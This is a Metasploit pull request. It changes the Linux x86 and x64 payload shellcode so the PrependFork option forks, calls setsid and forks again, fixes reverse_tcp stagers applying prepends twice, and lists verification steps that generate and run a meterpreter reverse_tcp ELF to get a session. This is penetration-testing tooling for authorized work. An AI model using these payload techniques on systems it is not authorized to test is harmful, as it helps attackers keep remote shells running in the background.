### PR TITLE
Add a call to setsid when forking a new process

### DIFF
--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -316,8 +316,7 @@ module Msf::Payload::Linux
         pre << "\x6a\x3c"             #    push    60        ; __NR_exit     #
         pre << "\x58"                 #    pop     rax                       #
         pre << "\x0f\x05"             #    syscall                           #
-        pre << "\x6a\x70"             #    push    112       ; __NR_setsid   #
-        pre << "\x58"                 #    pop     rax                       #
+        pre << "\x04\x70"             #    add     al, 112   ; __NR_setsid   #
         pre << "\x0f\x05"             #    syscall                           #
       end
 

--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -116,12 +116,20 @@ module Msf::Payload::Linux
                "\x58"                 + #   popl    %eax                       #
                "\xcd\x80"             + #   int     $0x80       ; fork         #
                "\x85\xc0"             + #   test    %eax,%eax                  #
-               "\x74\x06"             + #   jz      0xf                        #
+               "\x74\x06"             + #   jz      loc_000f                   #
+                                        # loc_0009:
                "\x31\xc0"             + #   xor     %eax,%eax                  #
                "\xb0\x01"             + #   movb    $0x1,%al                   #
                "\xcd\x80"             + #   int     $0x80       ; exit         #
+                                        # loc_000f:
                "\xb0\x42"             + #   movb    %0x42,%al                  #
-               "\xcd\x80"               #   int     $0x80       ; setsid       #
+               "\xcd\x80"             + #   int     $0x80       ; setsid       #
+
+               "\x6a\x02"             + #   pushb   $0x2                       #
+               "\x58"                 + #   popl    %eax                       #
+               "\xcd\x80"             + #   int     $0x80       ; fork         #
+               "\x85\xc0"             + #   test    %eax,%eax                  #
+               "\x75\xed"               #   jnz     loc_0009                   #
       end
 
       if (datastore['PrependSetresuid'])
@@ -175,6 +183,7 @@ module Msf::Payload::Linux
                "\x58"                 + #   popl    %eax                       #
                "\xcd\x80"               #   int     $0x80                      #
       end
+
       if (datastore['PrependChrootBreak'])
         # setreuid(0, 0)
         pre << "\x31\xc9"             + #   xorl    %ecx,%ecx                  #
@@ -212,7 +221,6 @@ module Msf::Payload::Linux
              "\x89\xd9"             + #   movl   %ebx,%ecx                   #
              "\x58"                 + #   popl   %eax                        #
              "\xcd\x80"               #   int     $0x80                      #
-
       end
 
       # Append exit(0)
@@ -306,18 +314,25 @@ module Msf::Payload::Linux
     elsif (test_arch.include?(ARCH_X64))
 
       if (datastore['PrependFork'])
-        # if (fork()) { exit(0); }; setsid();
+        # if (fork()) { exit(0); }; setsid(); if (fork()) { exit(0); };
         pre << "\x6a\x39"             #    push    57        ; __NR_fork     #
         pre << "\x58"                 #    pop     rax                       #
         pre << "\x0f\x05"             #    syscall                           #
         pre << "\x48\x85\xc0"         #    test    rax,rax                   #
-        pre << "\x74\x08"             #    jz      0x08                      #
+        pre << "\x74\x08"             #    jz      loc_0012                  #
+        #                             #  loc_000a:                           #
         pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
         pre << "\x6a\x3c"             #    push    60        ; __NR_exit     #
         pre << "\x58"                 #    pop     rax                       #
         pre << "\x0f\x05"             #    syscall                           #
+        #                             #  loc_0012:                           #
         pre << "\x04\x70"             #    add     al, 112   ; __NR_setsid   #
         pre << "\x0f\x05"             #    syscall                           #
+        pre << "\x6a\x39"             #    push    57        ; __NR_fork     #
+        pre << "\x58"                 #    pop     rax                       #
+        pre << "\x0f\x05"             #    syscall                           #
+        pre << "\x48\x85\xc0"         #    test    rax,rax                   #
+        pre << "\x75\xea"             #    jnz     loc_000a                  #
       end
 
       if (datastore['PrependSetresuid'])
@@ -426,19 +441,23 @@ module Msf::Payload::Linux
       end
 
       # Append exit(0)
+
       if (datastore['AppendExit'])
         app << "\x48\x31\xff"         #    xor     rdi,rdi                   #
         app << "\x6a\x3c"             #    push    0x3c                      #
         app << "\x58"                 #    pop     rax                       #
         app << "\x0f\x05"             #    syscall                           #
       end
+
     elsif (test_arch.include?(ARCH_ARMLE))
+
       if (datastore['PrependSetuid'])
         # setuid(0)
         pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
         pre << "\x17\x70\xa0\xe3"     #    mov r7, #23                       #
         pre << "\x00\x00\x00\xef"     #    svc                               #
       end
+
       if (datastore['PrependSetresuid'])
         # setresuid(ruid=0, euid=0, suid=0)
         pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #

--- a/lib/msf/core/payload/linux/reverse_tcp_x86.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp_x86.rb
@@ -51,8 +51,7 @@ module Payload::Linux::ReverseTcp_x86
   #
   def generate_reverse_tcp(opts={})
     asm = asm_reverse_tcp(opts)
-    buf = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
-    apply_prepends(buf)
+    Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
   end
 
   #

--- a/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb
@@ -50,8 +50,7 @@ module Payload::Linux::ReverseTcp_x64
   #
   def generate_reverse_tcp(opts={})
     asm = asm_reverse_tcp(opts)
-    buf = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
-    apply_prepends(buf)
+    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
   end
 
   #


### PR DESCRIPTION
This updates the assembly stub used by the `PrependFork` option that's available within Linux payloads. It adds a call to [`setsid(2)`](https://man7.org/linux/man-pages/man2/setsid.2.html) in the child process to properly run the payload in the background before calling `fork(2)` again. This is necessary in cases where an environment is expecting a command or something to return. This behavior also emulates what the Mettle payload's background option does, minus closing the stdin, stdout and stderr file descriptors (which is not exposed through datastore options) as well as the Python Meterpreter's `MeterpreterTryToFork` option.

Forking and starting a new session is a common pattern for running something in the background on Linux, so this allows module authors to do that when it's necessary within an exploitation-related environment.

wvu-r7 helped me look for modules where the added size ~~(4 bytes for 32-bit and 5 bytes for 64-bit payloads)~~ may break compatibility. There were no such instances identified because the Linux payloads are so small already.

This also fixes an issue where the prepends were being added twice by the reverse_tcp stagers.

## Verification

For each of x86 and x64 payloads

- [x] Start `msfconsole`
- [x] `use payload/linux/x##/meterpreter/reverse_tcp`
- [x] Set LHOST option as necessary and start a handler by running `to_handler`
- [x] Run `set PrependFork true`
- [x] Generate an ELF executable (easiest thing to test)
- [x] Execute the ELF executable on a Linux host
- [x] Get a functioning session
- [x] Use `ps` **on the Linux host, not the Meterpreter command** to see that the process did in fact call `setsid` by seeing that the PID, PGID and SID are all equivalent
    * Likewise these steps can be followed on the `master` branch and at this point you can see that the SID is not the same as the PID because a new session was not created
    * I was using the command `watch "ps xao pid,ppid,pgid,sid,comm | grep meterpreter"` for this step (my payload binary was named meterpreter)
- [x] See that the ELF executable that was run, returned it didn't cause the shell in which it was executed to "hang"
